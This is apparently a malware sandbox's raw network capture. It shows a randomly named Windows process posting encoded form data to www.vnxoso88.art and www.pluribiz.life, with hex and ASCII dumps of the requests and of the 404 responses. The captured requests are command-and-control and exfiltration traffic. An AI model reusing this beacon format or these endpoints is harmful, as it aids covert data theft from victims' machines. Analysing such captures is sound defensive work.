                                                                        Nov 7, 2024 17:58:28.689694881 CET | 1100 | IN | Data Raw: 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 48 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1
                                                                        Data Ascii: uW$FNcYXp8.Y*=HIV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<s84bm; ^W^F@0pC*0I+s:F7H|He+sZD'0,p$dEzBtb($Uk65


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.7 | 49851 | 66.29.146.14 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:30.580878973 CET | 663 | OUT | POST /d26j/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 235
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        Origin: http://www.vnxoso88.art
                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 32 71 70 44 5a 50 6c 6c 4b 32 67 74 75 42 30 45 51 57 36 67 5a 77 76 32 75 4f 69 4d 43 45 58 6b 48 45 36 34 64 6f 6b 2f 42 51 69 43 4f 68 35 32 73 3d
                                                                        Data Ascii: 7j=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uy2qpDZPllK2gtuB0EQW6gZwv2uOiMCEXkHE64dok/BQiCOh52s=
                                                                        Nov 7, 2024 17:58:31.242033005 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 16:58:31 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 1356ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                        Nov 7, 2024 17:58:31.242069960 CET | 1236 | IN | Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                        Nov 7, 2024 17:58:31.242082119 CET | 1236 | IN | Data Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                        Nov 7, 2024 17:58:31.242093086 CET | 1236 | IN | Data Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                        Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                        Nov 7, 2024 17:58:31.242105961 CET | 283 | IN | Data Raw: de 2e 98 ef 06 f0 4f c8 5f 09 75 7d a5 fc 89 2c d7 ec df 02 f5 33 34 fd e9 05 4e 7f fe 54 09 17 39 df 9b f0 7a a3 e7 e1 3f 52 14 d0 e2 3b d9 9f 35 74 f7 ed 11 fe 6c d5 23 fc 91 55 6e 70 f4 01 5f 57 81 e0 95 c5 c7 e7 02 de 7b 3d ff 32 a8 5e 5d bb
                                                                        Data Ascii: .O_u},34NT9z?R;5tl#Unp_W{=2^].l;JX8KOw>=wIn |O7/I-T?b.@g|"7{=T|&{6yc


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.7 | 49852 | 66.29.146.14 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:33.127088070 CET | 1676 | OUT | POST /d26j/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 1247
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        Origin: http://www.vnxoso88.art
                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 4a 33 42 49 34 50 4d 4d 37 56 45 62 6d 77 46 58 5a 30 79 62 72 66 5a 68 64 75 4b 39 56 57 6f 56 6f 68 49 48 56 79 31 2f 56 6e 2b 47 31 77 62 42 5a 35 49 33 38 4d 2f 37 55 31 4e 6a 55 35 57 68 5a 55 62 62 35 6d 48 70 52 32 4c 42 64 73 45 6e 72 71 63 6e 55 38 61 38 38 46 67 75 79 6d 73 42 42 4f 62 31 4f 53 2f 4d 74 41 38 55 37 30 37 78 46 51 6f 7a 57 62 33 73 67 61 49 45 75 57 53 36 45 56 66 72 55 46 45 34 6b 74 30 67 75 4b 69 46 4e 75 6b 56 48 48 67 4f 57 74 38 6d 45 4a 35 52 5a 4d 72 48 36 77 67 5a 37 61 49 47 7a 48 6a 38 39 75 76 66 30 35 36 42 53 35 34 77 72 69 65 69 53 56 48 7a 72 44 2b 7a 6d 45 66 37 61 43 6f 6e 57 46 30 49 6b 54 67 59 41 75 4d 45 52 35 30 68 65 53 54 55 44 4d 47 68 75 56 79 33 4e 77 4c 6a 30 36 78 2b 67 4b 67 41 54 71 56 32 76 79 71 69 6b 44 55 7a 68 65 58 39 50 57 75 5a 44 74 74 71 49 5a 48 38 67 56 7a 45 51 57 33 67 49 4f 6a 70 47 35 42 53 6d [TRUNCATED]
                                                                        Data Ascii: 7j= [TRUNCATED]
                                                                        Nov 7, 2024 17:58:33.803602934 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 07 Nov 2024 16:58:33 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 134CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                        Nov 7, 2024 17:58:33.803643942 CET | 212 | IN | Data Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0
                                                                        Nov 7, 2024 17:58:33.803653955 CET | 1236 | IN | Data Raw: fb 19 6f ce 65 5a 65 16 d7 d5 07 ce f5 72 18 bf 8a 1f fd ca be bd 1e 6f 3e 18 7a 15 09 b9 39 a7 f7 cb 6e 94 f3 72 e0 7e b6 fe 07 00 ba c9 d7 9f 19 fe 8d ea 07 c1 67 32 01 aa fd 5f 04 9f 1f c3 46 5d c4 7f 72 cc ca 7c b8 84 11 38 4f fd bf 58 66 e9
                                                                        Data Ascii: oeZero>z9nr~g2_F]r|8OXf/^j-2M^G_T(-m8?nCKjy{Z@/*P:}[dlR($};Lk! }q%fN~6_eAjxYPwgRgqSj|Ij
                                                                        Nov 7, 2024 17:58:33.803664923 CET | 1236 | IN | Data Raw: 39 b4 bc 94 a9 89 bc dc 1a 5c 5b 1f 87 04 15 28 6e 87 cb a6 a8 2e 5a 41 14 d5 58 8d 14 ab 2d b5 69 ee 24 8e 05 07 2c b9 5e b1 4c bb a6 6b 72 8b 23 e5 4a 0c 57 63 80 98 76 3f 66 7c ca 65 0f b1 29 4d a2 8a 62 11 48 ea 5a 70 39 4d ee ca b5 29 65 9a
                                                                        Data Ascii: 9\[(n.ZAX-i$,^Lkr#JWcv?f|e)MbHZp9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGfp
                                                                        Nov 7, 2024 17:58:33.803678036 CET | 1236 | IN | Data Raw: 04 bd 2e c7 65 b2 09 48 51 d8 f0 62 3b ab 16 a7 71 2d 8f 14 17 6e a9 b4 a0 bb 65 4a 99 27 71 b5 d8 46 2a d9 66 f4 fc a4 41 90 a3 af cb 9a 9b 43 0b 32 c7 68 96 f0 78 a7 f4 8e 41 c7 ab 6b 75 1f d7 82 be d8 15 5a 09 0e 57 34 87 2c fd b3 18 17 a6 46
                                                                        Data Ascii: .eHQb;q-neJ'qF*fAC2hxAkuZW4,F6Q;:fWSRWd@vHNgfD1zO[h6x<&8PDaz$d[DWu$P[;.n)Nkt56!]i,NKJ)"jMVx;uW$FNcYXp8.Y*
                                                                        Nov 7, 2024 17:58:33.803688049 CET | 76 | IN | Data Raw: 7c af b3 97 22 e2 dd 37 e6 7b 3d f1 bf ff 0b 54 7c d0 d1 e0 9a da 07 26 7b 36 9b 79 63 90 f7 f8 7a 84 af ad f6 08 3f e7 ab c7 cb b3 b8 6f bf fd 0f 00 00 00 ff ff 0d 0a 41 0d 0a 03 00 ea 36 39 22 74 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: |"7{=T|&{6ycz?oA69"t'0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.7 | 49853 | 66.29.146.14 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:35.675074100 CET | 389 | OUT | GET /d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gx HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Connection: close
                                                                        Host: www.vnxoso88.art
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Nov 7, 2024 17:58:36.369124889 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        date: Thu, 07 Nov 2024 16:58:36 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 32 37 37 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                        Data Ascii: 2774<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                        Nov 7, 2024 17:58:36.369148970 CET | 1236 | IN | Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                        Nov 7, 2024 17:58:36.369180918 CET | 1236 | IN | Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                        Nov 7, 2024 17:58:36.369193077 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                        Nov 7, 2024 17:58:36.369204044 CET | 1236 | IN | Data Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                        Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                        Nov 7, 2024 17:58:36.369214058 CET | 1236 | IN | Data Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a
                                                                        Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
                                                                        Nov 7, 2024 17:58:36.369224072 CET | 1236 | IN | Data Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59
                                                                        Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
                                                                        Nov 7, 2024 17:58:36.369235039 CET | 1236 | IN | Data Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20
                                                                        Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
                                                                        Nov 7, 2024 17:58:36.369246006 CET | 442 | IN | Data Raw: 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f
                                                                        Data Ascii: "container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg"


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.7 | 49854 | 209.74.64.58 | 80 | 3872 | C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 7, 2024 17:58:41.863027096 CET | 646 | OUT | POST /afcr/ HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 215
                                                                        Cache-Control: max-age=0
                                                                        Connection: close
                                                                        Host: www.pluribiz.life
                                                                        Origin: http://www.pluribiz.life
                                                                        Referer: http://www.pluribiz.life/afcr/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                        Data Raw: 37 6a 3d 6b 7a 38 48 43 47 6a 41 57 74 6f 43 58 46 37 31 71 64 76 37 6b 45 47 48 5a 6e 70 57 48 61 34 4e 35 52 77 36 6e 31 49 57 53 6f 33 6c 79 6d 4f 6e 77 2f 74 61 36 78 30 57 4f 65 47 75 54 43 4b 75 79 76 44 2f 69 64 77 33 30 6e 46 56 69 6d 4a 71 6e 35 72 59 4b 42 50 76 30 69 6c 46 48 65 55 2f 37 62 47 41 6c 32 70 2f 4b 75 70 34 37 42 4b 36 79 78 70 76 69 33 54 64 78 48 4a 30 71 61 37 64 79 56 31 37 31 37 68 36 49 78 50 37 45 56 6f 2b 34 4c 6c 4d 35 74 35 75 59 6e 48 6b 56 6b 67 39 66 67 6a 36 67 76 37 57 68 37 36 47 43 4c 53 65 68 64 4c 31 55 7a 4c 69 58 47 48 4f 45 36 6c 5a 39 4d 76 6c 58 4e 39 77 31 64 49 75 56 6b 37 64 56 77 3d 3d
                                                                        Data Ascii: 7j=kz8HCGjAWtoCXF71qdv7kEGHZnpWHa4N5Rw6n1IWSo3lymOnw/ta6x0WOeGuTCKuyvD/idw30nFVimJqn5rYKBPv0ilFHeU/7bGAl2p/Kup47BK6yxpvi3TdxHJ0qa7dyV1717h6IxP7EVo+4LlM5t5uYnHkVkg9fgj6gv7Wh76GCLSehdL1UzLiXGHOE6lZ9MvlXN9w1dIuVk7dVw==
                                                                        Nov 7, 2024 17:58:42.534456968 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 07 Nov 2024 16:58:42 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
